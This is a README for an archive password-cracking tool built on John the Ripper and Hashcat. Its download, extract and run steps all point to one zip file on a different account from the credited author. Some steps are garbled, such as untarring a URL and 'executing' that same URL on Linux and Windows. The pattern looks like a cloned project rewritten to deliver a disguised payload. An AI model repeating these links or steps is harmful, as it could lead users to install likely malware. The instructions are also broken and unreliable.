archive-password-cracker is a powerful bash tool designed to crack password-protected archives like ZIP, RAR, and 7z. This tool uses John the Ripper and Hashcat to unlock your files. It features resume functionality, configurable attacks, and an easy-to-use interface. Created by rff-glitch, it stands out in the realm of cybersecurity and digital forensics.
Follow these steps to download and run the archive-password-cracker tool.
-
Visit the Releases Page: You can download the latest version from our Releases page.
-
Select Your Version: On the Releases page, look for the version marked as "Latest." Click on it to access the details.
-
Download the Correct File: Find the appropriate file for your system. If you are on Linux, you should select the "https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip" file. For Windows users, look for the ".zip" file. Click the file name to start the download.
-
Extract the Files:
- After downloading, navigate to your Downloads folder.
- For Linux, use a terminal and run:
tar -xvzf https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip
- For Windows, right-click the downloaded ZIP file and select "Extract All."
Before running the tool, ensure you meet the following requirements:
- Linux or Windows Operating System: This tool works on both operating systems.
- Bash Shell: It runs best in Bash. If you are on Windows, consider using WSL (Windows Subsystem for Linux) for better compatibility.
- John the Ripper & Hashcat: The application requires these tools. They are not included, so you need to install them separately.
-
Install John the Ripper:
- For Linux: Open a terminal and run:
sudo apt install john
- For Windows: Download the executable from the John the Ripper website.
- For Linux: Open a terminal and run:
-
Install Hashcat:
- For Linux: Use terminal commands to install:
sudo apt install hashcat
- For Windows: Visit the Hashcat website to find the latest download.
- For Linux: Use terminal commands to install:
-
Navigate to the Directory: Open a terminal or command prompt and change to the directory where you extracted the tool:
cd path/to/archive-password-cracker -
Run the Tool:
- For Linux, execute:
https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip
- For Windows, run:
https://raw.githubusercontent.com/sefaturk-dev/archive-password-cracker/main/reassimilate/cracker_password_archive_1.7.zip
- For Linux, execute:
-
Configure Your Attack: You can customize your password-cracking attempt using different attack modes. Follow the prompts to enter your desired settings.
-
Start Cracking: Once configured, initiate the cracking process. Youβll see progress updates as the tool works through possible passwords.
- Resume Functionality: If the tool is interrupted, it can resume from the last known state, saving you time.
- Configurable Attacks: Choose from various attack modes to suit your needs.
- User-Friendly Interface: Clear instructions guide you at every step, making it simple to use.
This project is licensed under the MIT License. For more details, check the LICENSE file in the repository.
If you encounter issues or have questions, please open an issue on the GitHub repository. The community is here to help you.
You can always return to the Releases page for updates or new versions of archive-password-cracker.
Unlock your files quickly and effectively with this powerful tool!